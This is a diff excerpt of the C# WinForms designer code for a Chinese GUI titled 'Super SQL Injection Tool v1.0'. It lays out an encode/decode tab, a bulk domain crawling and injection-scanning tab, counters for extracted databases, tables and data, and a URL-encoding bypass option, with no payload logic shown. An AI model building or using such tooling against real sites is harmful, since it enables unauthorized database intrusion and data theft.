+ this.label21.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)));
+ this.label21.AutoSize = true;
+ this.label21.Location = new System.Drawing.Point(32, 29);
+ this.label21.Name = "label21";
+ this.label21.Size = new System.Drawing.Size(65, 12);
+ this.label21.TabIndex = 8;
+ this.label21.Text = "编码方式:";
+ //
+ // label23
+ //
+ this.label23.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)));
+ this.label23.AutoSize = true;
+ this.label23.Location = new System.Drawing.Point(363, 29);
+ this.label23.Name = "label23";
+ this.label23.Size = new System.Drawing.Size(65, 12);
+ this.label23.TabIndex = 9;
+ this.label23.Text = "解码方式:";
+ //
+ // encode_cbox_encode
+ //
+ this.encode_cbox_encode.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)));
+ this.encode_cbox_encode.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.encode_cbox_encode.FormattingEnabled = true;
+ this.encode_cbox_encode.Items.AddRange(new object[] {
+ "选择编码格式",
+ "URLEncode",
+ "Base64Encode",
+ "字符转Unicode",
+ "字符转16进制(UTF-8编码)",
+ "MD5加密"});
+ this.encode_cbox_encode.Location = new System.Drawing.Point(103, 25);
+ this.encode_cbox_encode.Name = "encode_cbox_encode";
+ this.encode_cbox_encode.Size = new System.Drawing.Size(200, 20);
+ this.encode_cbox_encode.TabIndex = 4;
+ this.encode_cbox_encode.SelectedIndexChanged += new System.EventHandler(this.encode_cbox_encode_SelectedIndexChanged);
+ //
+ // encode_cbox_decode
+ //
+ this.encode_cbox_decode.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)));
+ this.encode_cbox_decode.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.encode_cbox_decode.FormattingEnabled = true;
+ this.encode_cbox_decode.Items.AddRange(new object[] {
+ "选择解码格式",
+ "URLDecode",
+ "Base64Decode",
+ "Unicode转字符",
+ "16进制(UTF-8编码)转字符串",
+ "MD5解密"});
+ this.encode_cbox_decode.Location = new System.Drawing.Point(434, 25);
+ this.encode_cbox_decode.Name = "encode_cbox_decode";
+ this.encode_cbox_decode.Size = new System.Drawing.Size(200, 20);
+ this.encode_cbox_decode.TabIndex = 5;
+ this.encode_cbox_decode.SelectedIndexChanged += new System.EventHandler(this.encode_cbox_decode_SelectedIndexChanged);
+ //
+ // groupBox11
+ //
+ this.groupBox11.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox11.Controls.Add(this.encode_txt_result);
+ this.groupBox11.Location = new System.Drawing.Point(0, 99);
+ this.groupBox11.Name = "groupBox11";
+ this.groupBox11.Size = new System.Drawing.Size(799, 256);
+ this.groupBox11.TabIndex = 7;
+ this.groupBox11.TabStop = false;
+ this.groupBox11.Text = "结果:";
+ //
+ // encode_txt_result
+ //
+ this.encode_txt_result.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.encode_txt_result.Location = new System.Drawing.Point(3, 17);
+ this.encode_txt_result.MaxLength = 3276700;
+ this.encode_txt_result.Multiline = true;
+ this.encode_txt_result.Name = "encode_txt_result";
+ this.encode_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
+ this.encode_txt_result.Size = new System.Drawing.Size(793, 236);
+ this.encode_txt_result.TabIndex = 2;
+ this.encode_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.encode_txt_result_KeyDown);
+ //
+ // groupBox10
+ //
+ this.groupBox10.Controls.Add(this.encode_txt_input);
+ this.groupBox10.Dock = System.Windows.Forms.DockStyle.Top;
+ this.groupBox10.Location = new System.Drawing.Point(0, 0);
+ this.groupBox10.Name = "groupBox10";
+ this.groupBox10.Size = new System.Drawing.Size(802, 97);
+ this.groupBox10.TabIndex = 6;
+ this.groupBox10.TabStop = false;
+ this.groupBox10.Text = "输入:";
+ //
+ // encode_txt_input
+ //
+ this.encode_txt_input.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.encode_txt_input.Location = new System.Drawing.Point(3, 17);
+ this.encode_txt_input.MaxLength = 3276700;
+ this.encode_txt_input.Multiline = true;
+ this.encode_txt_input.Name = "encode_txt_input";
+ this.encode_txt_input.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
+ this.encode_txt_input.Size = new System.Drawing.Size(796, 77);
+ this.encode_txt_input.TabIndex = 1;
+ this.encode_txt_input.TextChanged += new System.EventHandler(this.encode_txt_encode_TextChanged);
+ this.encode_txt_input.KeyDown += new System.Windows.Forms.KeyEventHandler(this.encode_txt_input_KeyDown);
+ //
+ // tab_scanInjection
+ //
+ this.tab_scanInjection.Controls.Add(this.groupBox14);
+ this.tab_scanInjection.Controls.Add(this.groupBox12);
+ this.tab_scanInjection.ImageKey = "scan.png";
+ this.tab_scanInjection.Location = new System.Drawing.Point(4, 23);
+ this.tab_scanInjection.Name = "tab_scanInjection";
+ this.tab_scanInjection.Size = new System.Drawing.Size(802, 424);
+ this.tab_scanInjection.TabIndex = 8;
+ this.tab_scanInjection.Text = "注入扫描";
+ this.tab_scanInjection.UseVisualStyleBackColor = true;
+ //
+ // groupBox14
+ //
+ this.groupBox14.Controls.Add(this.splitContainer2);
+ this.groupBox14.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.groupBox14.Location = new System.Drawing.Point(0, 95);
+ this.groupBox14.Name = "groupBox14";
+ this.groupBox14.Size = new System.Drawing.Size(802, 329);
+ this.groupBox14.TabIndex = 21;
+ this.groupBox14.TabStop = false;
+ //
+ // splitContainer2
+ //
+ this.splitContainer2.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.splitContainer2.Location = new System.Drawing.Point(3, 17);
+ this.splitContainer2.Name = "splitContainer2";
+ //
+ // splitContainer2.Panel1
+ //
+ this.splitContainer2.Panel1.Controls.Add(this.scanInject_lsb_links);
+ //
+ // splitContainer2.Panel2
+ //
+ this.splitContainer2.Panel2.Controls.Add(this.scanInjection_lvw_result);
+ this.splitContainer2.Size = new System.Drawing.Size(796, 309);
+ this.splitContainer2.SplitterDistance = 237;
+ this.splitContainer2.TabIndex = 18;
+ //
+ // scanInject_lsb_links
+ //
+ this.scanInject_lsb_links.ContextMenuStrip = this.scanInjectionURL_cms;
+ this.scanInject_lsb_links.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.scanInject_lsb_links.FormattingEnabled = true;
+ this.scanInject_lsb_links.ItemHeight = 12;
+ this.scanInject_lsb_links.Location = new System.Drawing.Point(0, 0);
+ this.scanInject_lsb_links.Name = "scanInject_lsb_links";
+ this.scanInject_lsb_links.ScrollAlwaysVisible = true;
+ this.scanInject_lsb_links.Size = new System.Drawing.Size(237, 309);
+ this.scanInject_lsb_links.TabIndex = 0;
+ //
+ // scanInjectionURL_cms
+ //
+ this.scanInjectionURL_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_exportScanInjectionURL,
+ this.tsmi_clearScanInjectionURL});
+ this.scanInjectionURL_cms.Name = "scanInjectionURL_cms";
+ this.scanInjectionURL_cms.Size = new System.Drawing.Size(124, 48);
+ //
+ // tsmi_exportScanInjectionURL
+ //
+ this.tsmi_exportScanInjectionURL.Name = "tsmi_exportScanInjectionURL";
+ this.tsmi_exportScanInjectionURL.Size = new System.Drawing.Size(123, 22);
+ this.tsmi_exportScanInjectionURL.Text = "导出URL";
+ this.tsmi_exportScanInjectionURL.Click += new System.EventHandler(this.tsmi_exportScanInjectionURL_Click);
+ //
+ // tsmi_clearScanInjectionURL
+ //
+ this.tsmi_clearScanInjectionURL.Name = "tsmi_clearScanInjectionURL";
+ this.tsmi_clearScanInjectionURL.Size = new System.Drawing.Size(123, 22);
+ this.tsmi_clearScanInjectionURL.Text = "清 空";
+ this.tsmi_clearScanInjectionURL.Click += new System.EventHandler(this.tsmi_clearScanInjectionURL_Click);
+ //
+ // scanInjection_lvw_result
+ //
+ this.scanInjection_lvw_result.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.col_index,
+ this.col_url,
+ this.col_testURL,
+ this.col_param,
+ this.col_injectionType,
+ this.col_injectionDB,
+ this.col_mark});
+ this.scanInjection_lvw_result.ContextMenuStrip = this.scanInjection_cms;
+ this.scanInjection_lvw_result.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.scanInjection_lvw_result.FullRowSelect = true;
+ this.scanInjection_lvw_result.GridLines = true;
+ this.scanInjection_lvw_result.Location = new System.Drawing.Point(0, 0);
+ this.scanInjection_lvw_result.Name = "scanInjection_lvw_result";
+ this.scanInjection_lvw_result.Size = new System.Drawing.Size(555, 309);
+ this.scanInjection_lvw_result.TabIndex = 5;
+ this.scanInjection_lvw_result.UseCompatibleStateImageBehavior = false;
+ this.scanInjection_lvw_result.View = System.Windows.Forms.View.Details;
+ this.scanInjection_lvw_result.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.scanInjection_lvw_result_ColumnClick);
+ this.scanInjection_lvw_result.DoubleClick += new System.EventHandler(this.scanInjection_lvw_result_DoubleClick);
+ //
+ // col_index
+ //
+ this.col_index.Text = "序号";
+ this.col_index.Width = 46;
+ //
+ // col_url
+ //
+ this.col_url.Text = "原始URL";
+ this.col_url.Width = 100;
+ //
+ // col_testURL
+ //
+ this.col_testURL.Text = "测试URL";
+ this.col_testURL.Width = 150;
+ //
+ // col_param
+ //
+ this.col_param.Text = "注入参数";
+ //
+ // col_injectionType
+ //
+ this.col_injectionType.Text = "注入类型";
+ this.col_injectionType.Width = 65;
+ //
+ // col_injectionDB
+ //
+ this.col_injectionDB.Text = "数据库类型";
+ this.col_injectionDB.Width = 75;
+ //
+ // col_mark
+ //
+ this.col_mark.Text = "备注";
+ //
+ // scanInjection_cms
+ //
+ this.scanInjection_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.scanInjection_cms_exportResult,
+ this.tsmi_tsmi_exortTestURL,
+ this.tsmi_tsmi_exortOldURL,
+ this.scanInjection_cms_copyURL,
+ this.scanInjection_cms_clearResult,
+ this.scanInjection_cms_delThisLine,
+ this.tsmi_openURL,
+ this.tsmi_tsmi_opentestURL});
+ this.scanInjection_cms.Name = "scanInjection_cms";
+ this.scanInjection_cms.Size = new System.Drawing.Size(149, 180);
+ //
+ // scanInjection_cms_exportResult
+ //
+ this.scanInjection_cms_exportResult.Name = "scanInjection_cms_exportResult";
+ this.scanInjection_cms_exportResult.Size = new System.Drawing.Size(148, 22);
+ this.scanInjection_cms_exportResult.Text = "导出扫描结果";
+ this.scanInjection_cms_exportResult.Click += new System.EventHandler(this.scanInjection_cms_exportResult_Click);
+ //
+ // tsmi_tsmi_exortTestURL
+ //
+ this.tsmi_tsmi_exortTestURL.Name = "tsmi_tsmi_exortTestURL";
+ this.tsmi_tsmi_exortTestURL.Size = new System.Drawing.Size(148, 22);
+ this.tsmi_tsmi_exortTestURL.Text = "导出测试URL";
+ this.tsmi_tsmi_exortTestURL.Click += new System.EventHandler(this.tsmi_tsmi_exortTestURL_Click);
+ //
+ // tsmi_tsmi_exortOldURL
+ //
+ this.tsmi_tsmi_exortOldURL.Name = "tsmi_tsmi_exortOldURL";
+ this.tsmi_tsmi_exortOldURL.Size = new System.Drawing.Size(148, 22);
+ this.tsmi_tsmi_exortOldURL.Text = "导出原始URL";
+ this.tsmi_tsmi_exortOldURL.Click += new System.EventHandler(this.tsmi_tsmi_exortOldURL_Click);
+ //
+ // scanInjection_cms_copyURL
+ //
+ this.scanInjection_cms_copyURL.Name = "scanInjection_cms_copyURL";
+ this.scanInjection_cms_copyURL.Size = new System.Drawing.Size(148, 22);
+ this.scanInjection_cms_copyURL.Text = "复制URL";
+ this.scanInjection_cms_copyURL.Click += new System.EventHandler(this.scanInjection_cms_copyURL_Click);
+ //
+ // scanInjection_cms_clearResult
+ //
+ this.scanInjection_cms_clearResult.Name = "scanInjection_cms_clearResult";
+ this.scanInjection_cms_clearResult.Size = new System.Drawing.Size(148, 22);
+ this.scanInjection_cms_clearResult.Text = "清空结果";
+ this.scanInjection_cms_clearResult.Click += new System.EventHandler(this.scanInjection_cms_clearResult_Click);
+ //
+ // scanInjection_cms_delThisLine
+ //
+ this.scanInjection_cms_delThisLine.Name = "scanInjection_cms_delThisLine";
+ this.scanInjection_cms_delThisLine.Size = new System.Drawing.Size(148, 22);
+ this.scanInjection_cms_delThisLine.Text = "删除选中行";
+ this.scanInjection_cms_delThisLine.Click += new System.EventHandler(this.scanInjection_cms_delThisLine_Click);
+ //
+ // tsmi_openURL
+ //
+ this.tsmi_openURL.Name = "tsmi_openURL";
+ this.tsmi_openURL.Size = new System.Drawing.Size(148, 22);
+ this.tsmi_openURL.Text = "打开原始URL";
+ this.tsmi_openURL.Click += new System.EventHandler(this.tsmi_openURL_Click);
+ //
+ // tsmi_tsmi_opentestURL
+ //
+ this.tsmi_tsmi_opentestURL.Name = "tsmi_tsmi_opentestURL";
+ this.tsmi_tsmi_opentestURL.Size = new System.Drawing.Size(148, 22);
+ this.tsmi_tsmi_opentestURL.Text = "打开测试URL";
+ this.tsmi_tsmi_opentestURL.Click += new System.EventHandler(this.tsmi_tsmi_opentestURL_Click);
+ //
+ // groupBox12
+ //
+ this.groupBox12.Controls.Add(this.scanInect_chk_isSpider);
+ this.groupBox12.Controls.Add(this.scanInect_chk_scanError);
+ this.groupBox12.Controls.Add(this.scanInjection_btn_spider);
+ this.groupBox12.Controls.Add(this.scanInjection_btn_scan);
+ this.groupBox12.Controls.Add(this.scanInjection_importDomains);
+ this.groupBox12.Controls.Add(this.scanInjection_scanedURLSCount);
+ this.groupBox12.Controls.Add(this.scanInjection_txt_domainsPath);
+ this.groupBox12.Controls.Add(this.scanInjection_findURLSCount);
+ this.groupBox12.Controls.Add(this.label20);
+ this.groupBox12.Controls.Add(this.label30);
+ this.groupBox12.Controls.Add(this.label22);
+ this.groupBox12.Controls.Add(this.label26);
+ this.groupBox12.Controls.Add(this.scanInjection_domainsCount);
+ this.groupBox12.Controls.Add(this.scanInjection_scanedDomainCount);
+ this.groupBox12.Controls.Add(this.label25);
+ this.groupBox12.Dock = System.Windows.Forms.DockStyle.Top;
+ this.groupBox12.Location = new System.Drawing.Point(0, 0);
+ this.groupBox12.Name = "groupBox12";
+ this.groupBox12.Size = new System.Drawing.Size(802, 95);
+ this.groupBox12.TabIndex = 21;
+ this.groupBox12.TabStop = false;
+ this.groupBox12.Text = " ";
+ //
+ // scanInect_chk_isSpider
+ //
+ this.scanInect_chk_isSpider.AutoSize = true;
+ this.scanInect_chk_isSpider.Checked = true;
+ this.scanInect_chk_isSpider.CheckState = System.Windows.Forms.CheckState.Checked;
+ this.scanInect_chk_isSpider.Location = new System.Drawing.Point(329, 26);
+ this.scanInect_chk_isSpider.Name = "scanInect_chk_isSpider";
+ this.scanInect_chk_isSpider.Size = new System.Drawing.Size(96, 16);
+ this.scanInect_chk_isSpider.TabIndex = 19;
+ this.scanInect_chk_isSpider.Text = "是否爬行一次";
+ this.scanInect_chk_isSpider.UseVisualStyleBackColor = true;
+ //
+ // scanInect_chk_scanError
+ //
+ this.scanInect_chk_scanError.AutoSize = true;
+ this.scanInect_chk_scanError.Location = new System.Drawing.Point(490, 25);
+ this.scanInect_chk_scanError.Name = "scanInect_chk_scanError";
+ this.scanInect_chk_scanError.Size = new System.Drawing.Size(84, 16);
+ this.scanInect_chk_scanError.TabIndex = 20;
+ this.scanInect_chk_scanError.Text = "只扫错误型";
+ this.scanInect_chk_scanError.UseVisualStyleBackColor = true;
+ //
+ // scanInjection_btn_spider
+ //
+ this.scanInjection_btn_spider.Location = new System.Drawing.Point(703, 16);
+ this.scanInjection_btn_spider.Name = "scanInjection_btn_spider";
+ this.scanInjection_btn_spider.Size = new System.Drawing.Size(75, 23);
+ this.scanInjection_btn_spider.TabIndex = 1;
+ this.scanInjection_btn_spider.Text = "爬行链接";
+ this.scanInjection_btn_spider.UseVisualStyleBackColor = true;
+ this.scanInjection_btn_spider.Click += new System.EventHandler(this.scanInjection_btn_spider_Click);
+ //
+ // scanInjection_btn_scan
+ //
+ this.scanInjection_btn_scan.Location = new System.Drawing.Point(703, 57);
+ this.scanInjection_btn_scan.Name = "scanInjection_btn_scan";
+ this.scanInjection_btn_scan.Size = new System.Drawing.Size(75, 23);
+ this.scanInjection_btn_scan.TabIndex = 1;
+ this.scanInjection_btn_scan.Text = "扫描注入";
+ this.scanInjection_btn_scan.UseVisualStyleBackColor = true;
+ this.scanInjection_btn_scan.Click += new System.EventHandler(this.scanInjection_btn_scan_Click);
+ //
+ // scanInjection_importDomains
+ //
+ this.scanInjection_importDomains.Location = new System.Drawing.Point(183, 22);
+ this.scanInjection_importDomains.Name = "scanInjection_importDomains";
+ this.scanInjection_importDomains.Size = new System.Drawing.Size(61, 23);
+ this.scanInjection_importDomains.TabIndex = 2;
+ this.scanInjection_importDomains.Text = "导入";
+ this.scanInjection_importDomains.UseVisualStyleBackColor = true;
+ this.scanInjection_importDomains.Click += new System.EventHandler(this.scanInjection_importDomains_Click);
+ //
+ // scanInjection_scanedURLSCount
+ //
+ this.scanInjection_scanedURLSCount.AutoSize = true;
+ this.scanInjection_scanedURLSCount.Location = new System.Drawing.Point(562, 66);
+ this.scanInjection_scanedURLSCount.Name = "scanInjection_scanedURLSCount";
+ this.scanInjection_scanedURLSCount.Size = new System.Drawing.Size(11, 12);
+ this.scanInjection_scanedURLSCount.TabIndex = 16;
+ this.scanInjection_scanedURLSCount.Text = "0";
+ //
+ // scanInjection_txt_domainsPath
+ //
+ this.scanInjection_txt_domainsPath.Location = new System.Drawing.Point(66, 23);
+ this.scanInjection_txt_domainsPath.Name = "scanInjection_txt_domainsPath";
+ this.scanInjection_txt_domainsPath.Size = new System.Drawing.Size(111, 21);
+ this.scanInjection_txt_domainsPath.TabIndex = 3;
+ //
+ // scanInjection_findURLSCount
+ //
+ this.scanInjection_findURLSCount.AutoSize = true;
+ this.scanInjection_findURLSCount.Location = new System.Drawing.Point(407, 67);
+ this.scanInjection_findURLSCount.Name = "scanInjection_findURLSCount";
+ this.scanInjection_findURLSCount.Size = new System.Drawing.Size(11, 12);
+ this.scanInjection_findURLSCount.TabIndex = 16;
+ this.scanInjection_findURLSCount.Text = "0";
+ //
+ // label20
+ //
+ this.label20.AutoSize = true;
+ this.label20.Location = new System.Drawing.Point(26, 26);
+ this.label20.Name = "label20";
+ this.label20.Size = new System.Drawing.Size(35, 12);
+ this.label20.TabIndex = 4;
+ this.label20.Text = "URL:";
+ //
+ // label30
+ //
+ this.label30.AutoSize = true;
+ this.label30.Location = new System.Drawing.Point(488, 66);
+ this.label30.Name = "label30";
+ this.label30.Size = new System.Drawing.Size(71, 12);
+ this.label30.TabIndex = 15;
+ this.label30.Text = "已扫描URL:";
+ //
+ // label22
+ //
+ this.label22.AutoSize = true;
+ this.label22.Location = new System.Drawing.Point(26, 66);
+ this.label22.Name = "label22";
+ this.label22.Size = new System.Drawing.Size(95, 12);
+ this.label22.TabIndex = 11;
+ this.label22.Text = "域名或URL总数:";
+ //
+ // label26
+ //
+ this.label26.AutoSize = true;
+ this.label26.Location = new System.Drawing.Point(327, 67);
+ this.label26.Name = "label26";
+ this.label26.Size = new System.Drawing.Size(71, 12);
+ this.label26.TabIndex = 15;
+ this.label26.Text = "待扫描URL:";
+ //
+ // scanInjection_domainsCount
+ //
+ this.scanInjection_domainsCount.AutoSize = true;
+ this.scanInjection_domainsCount.Location = new System.Drawing.Point(127, 67);
+ this.scanInjection_domainsCount.Name = "scanInjection_domainsCount";
+ this.scanInjection_domainsCount.Size = new System.Drawing.Size(11, 12);
+ this.scanInjection_domainsCount.TabIndex = 12;
+ this.scanInjection_domainsCount.Text = "0";
+ //
+ // scanInjection_scanedDomainCount
+ //
+ this.scanInjection_scanedDomainCount.AutoSize = true;
+ this.scanInjection_scanedDomainCount.Location = new System.Drawing.Point(233, 67);
+ this.scanInjection_scanedDomainCount.Name = "scanInjection_scanedDomainCount";
+ this.scanInjection_scanedDomainCount.Size = new System.Drawing.Size(11, 12);
+ this.scanInjection_scanedDomainCount.TabIndex = 14;
+ this.scanInjection_scanedDomainCount.Text = "0";
+ //
+ // label25
+ //
+ this.label25.AutoSize = true;
+ this.label25.Location = new System.Drawing.Point(177, 67);
+ this.label25.Name = "label25";
+ this.label25.Size = new System.Drawing.Size(53, 12);
+ this.label25.TabIndex = 13;
+ this.label25.Text = "已爬行:";
+ //
+ // statusStrip1
+ //
+ this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.toolStripStatusLabel1,
+ this.status_lbl_time,
+ this.toolStripStatusLabel2,
+ this.status_lbl_threadStatus,
+ this.toolStripStatusLabel3,
+ this.toolStripStatusLabel4,
+ this.status_lbl_dbsCount,
+ this.toolStripStatusLabel5,
+ this.status_lbl_tableCount,
+ this.toolStripStatusLabel6,
+ this.status_lbl_dataCount,
+ this.toolStripStatusLabel7,
+ this.status_lbl_runStatus,
+ this.toolStripStatusLabel8,
+ this.status_lbl_all_status,
+ this.toolStripStatusLabel11,
+ this.lbl_packsCount});
+ this.statusStrip1.Location = new System.Drawing.Point(0, 659);
+ this.statusStrip1.Name = "statusStrip1";
+ this.statusStrip1.Size = new System.Drawing.Size(834, 22);
+ this.statusStrip1.TabIndex = 4;
+ this.statusStrip1.Text = "statusStrip1";
+ //
+ // toolStripStatusLabel1
+ //
+ this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
+ this.toolStripStatusLabel1.Size = new System.Drawing.Size(68, 17);
+ this.toolStripStatusLabel1.Text = "运行时间:";
+ //
+ // status_lbl_time
+ //
+ this.status_lbl_time.Name = "status_lbl_time";
+ this.status_lbl_time.Size = new System.Drawing.Size(15, 17);
+ this.status_lbl_time.Text = "0";
+ //
+ // toolStripStatusLabel2
+ //
+ this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
+ this.toolStripStatusLabel2.Size = new System.Drawing.Size(68, 17);
+ this.toolStripStatusLabel2.Text = "当前线程:";
+ //
+ // status_lbl_threadStatus
+ //
+ this.status_lbl_threadStatus.Name = "status_lbl_threadStatus";
+ this.status_lbl_threadStatus.Size = new System.Drawing.Size(27, 17);
+ this.status_lbl_threadStatus.Text = "0/0";
+ //
+ // toolStripStatusLabel3
+ //
+ this.toolStripStatusLabel3.Name = "toolStripStatusLabel3";
+ this.toolStripStatusLabel3.Size = new System.Drawing.Size(0, 17);
+ //
+ // toolStripStatusLabel4
+ //
+ this.toolStripStatusLabel4.Name = "toolStripStatusLabel4";
+ this.toolStripStatusLabel4.Size = new System.Drawing.Size(56, 17);
+ this.toolStripStatusLabel4.Text = "数据库:";
+ //
+ // status_lbl_dbsCount
+ //
+ this.status_lbl_dbsCount.Name = "status_lbl_dbsCount";
+ this.status_lbl_dbsCount.Size = new System.Drawing.Size(15, 17);
+ this.status_lbl_dbsCount.Text = "0";
+ //
+ // toolStripStatusLabel5
+ //
+ this.toolStripStatusLabel5.Name = "toolStripStatusLabel5";
+ this.toolStripStatusLabel5.Size = new System.Drawing.Size(56, 17);
+ this.toolStripStatusLabel5.Text = "表数量:";
+ //
+ // status_lbl_tableCount
+ //
+ this.status_lbl_tableCount.Name = "status_lbl_tableCount";
+ this.status_lbl_tableCount.Size = new System.Drawing.Size(15, 17);
+ this.status_lbl_tableCount.Text = "0";
+ //
+ // toolStripStatusLabel6
+ //
+ this.toolStripStatusLabel6.Name = "toolStripStatusLabel6";
+ this.toolStripStatusLabel6.Size = new System.Drawing.Size(68, 17);
+ this.toolStripStatusLabel6.Text = "数据获取:";
+ //
+ // status_lbl_dataCount
+ //
+ this.status_lbl_dataCount.Name = "status_lbl_dataCount";
+ this.status_lbl_dataCount.Size = new System.Drawing.Size(15, 17);
+ this.status_lbl_dataCount.Text = "0";
+ //
+ // toolStripStatusLabel7
+ //
+ this.toolStripStatusLabel7.Name = "toolStripStatusLabel7";
+ this.toolStripStatusLabel7.Size = new System.Drawing.Size(44, 17);
+ this.toolStripStatusLabel7.Text = "状态:";
+ //
+ // status_lbl_runStatus
+ //
+ this.status_lbl_runStatus.Name = "status_lbl_runStatus";
+ this.status_lbl_runStatus.Size = new System.Drawing.Size(44, 17);
+ this.status_lbl_runStatus.Text = "未开始";
+ //
+ // toolStripStatusLabel8
+ //
+ this.toolStripStatusLabel8.Name = "toolStripStatusLabel8";
+ this.toolStripStatusLabel8.Size = new System.Drawing.Size(44, 17);
+ this.toolStripStatusLabel8.Text = "进度:";
+ //
+ // status_lbl_all_status
+ //
+ this.status_lbl_all_status.Name = "status_lbl_all_status";
+ this.status_lbl_all_status.Size = new System.Drawing.Size(27, 17);
+ this.status_lbl_all_status.Text = "0/0";
+ //
+ // toolStripStatusLabel11
+ //
+ this.toolStripStatusLabel11.Name = "toolStripStatusLabel11";
+ this.toolStripStatusLabel11.Size = new System.Drawing.Size(56, 17);
+ this.toolStripStatusLabel11.Text = "已发包:";
+ //
+ // lbl_packsCount
+ //
+ this.lbl_packsCount.Name = "lbl_packsCount";
+ this.lbl_packsCount.Size = new System.Drawing.Size(15, 17);
+ this.lbl_packsCount.Text = "0";
+ //
+ // timer_status
+ //
+ this.timer_status.Enabled = true;
+ this.timer_status.Interval = 1000;
+ this.timer_status.Tick += new System.EventHandler(this.timer_status_Tick);
+ //
+ // timer_scanInjection
+ //
+ this.timer_scanInjection.Enabled = true;
+ this.timer_scanInjection.Interval = 1000;
+ this.timer_scanInjection.Tick += new System.EventHandler(this.timer_scanInjection_Tick);
+ //
+ // cbox_bypass_urlencode_count
+ //
+ this.cbox_bypass_urlencode_count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cbox_bypass_urlencode_count.FormattingEnabled = true;
+ this.cbox_bypass_urlencode_count.Items.AddRange(new object[] {
+ "一次",
+ "二次"});
+ this.cbox_bypass_urlencode_count.Location = new System.Drawing.Point(329, 23);
+ this.cbox_bypass_urlencode_count.Name = "cbox_bypass_urlencode_count";
+ this.cbox_bypass_urlencode_count.Size = new System.Drawing.Size(78, 20);
+ this.cbox_bypass_urlencode_count.TabIndex = 23;
+ this.cbox_bypass_urlencode_count.TextChanged += new System.EventHandler(this.cbox_bypass_urlencode_count_TextChanged);
+ //
+ // Main
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(834, 681);
+ this.Controls.Add(this.statusStrip1);
+ this.Controls.Add(this.gb_logo);
+ this.Controls.Add(this.mytab);
+ this.Controls.Add(this.gb_basic);
+ this.Controls.Add(this.menuStrip_main);
+ this.MainMenuStrip = this.menuStrip_main;
+ this.Name = "Main";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "超级SQL注入工具 v1.0 正式版 20160525";
+ this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Main_FormClosing);
+ this.Shown += new System.EventHandler(this.Main_Shown);
+ this.gb_basic.ResumeLayout(false);
+ this.gb_basic.PerformLayout();
+ this.menuStrip_main.ResumeLayout(false);
+ this.menuStrip_main.PerformLayout();
+ this.gb_logo.ResumeLayout(false);
+ this.gb_logo.PerformLayout();
+ this.tab_logCenter.ResumeLayout(false);
+ this.splitContainer1.Panel1.ResumeLayout(false);
+ this.splitContainer1.Panel2.ResumeLayout(false);
+ ((System.ComponentModel.ISupportInitialize)(this.splitContainer1)).EndInit();
+ this.splitContainer1.ResumeLayout(false);
+ this.groupBox5.ResumeLayout(false);
+ this.log_cms_dataifo.ResumeLayout(false);
+ this.groupBox6.ResumeLayout(false);
+ this.tabControl2.ResumeLayout(false);
+ this.tabPage3.ResumeLayout(false);
+ this.tabPage3.PerformLayout();
+ this.tabPage4.ResumeLayout(false);
+ this.tabPage4.PerformLayout();
+ this.tabPage1.ResumeLayout(false);
+ this.tab_file.ResumeLayout(false);
+ this.tab_file.PerformLayout();
+ this.groupBox7.ResumeLayout(false);
+ this.groupBox7.PerformLayout();
+ this.tab_dataCenter.ResumeLayout(false);
+ this.tabC_dataCenter.ResumeLayout(false);
+ this.tab_vers.ResumeLayout(false);
+ this.data_cms_vers.ResumeLayout(false);
+ this.tab_dbs.ResumeLayout(false);
+ this.spc_dbs.Panel1.ResumeLayout(false);
+ this.spc_dbs.Panel1.PerformLayout();
+ this.spc_dbs.Panel2.ResumeLayout(false);
+ this.spc_dbs.Panel2.PerformLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.spc_dbs)).EndInit();
+ this.spc_dbs.ResumeLayout(false);
+ this.data_dbs_ts.ResumeLayout(false);
+ this.data_dbs_ts.PerformLayout();
+ this.groupBox2.ResumeLayout(false);
+ this.data_cms_dbs.ResumeLayout(false);
+ this.toolStrip1.ResumeLayout(false);
+ this.toolStrip1.PerformLayout();
+ this.groupBox4.ResumeLayout(false);
+ this.cms_data_dbs_lvw_data.ResumeLayout(false);
+ this.tab_injectCenter.ResumeLayout(false);
+ this.groupBox1.ResumeLayout(false);
+ this.groupBox1.PerformLayout();
+ this.cms_dataPacks.ResumeLayout(false);
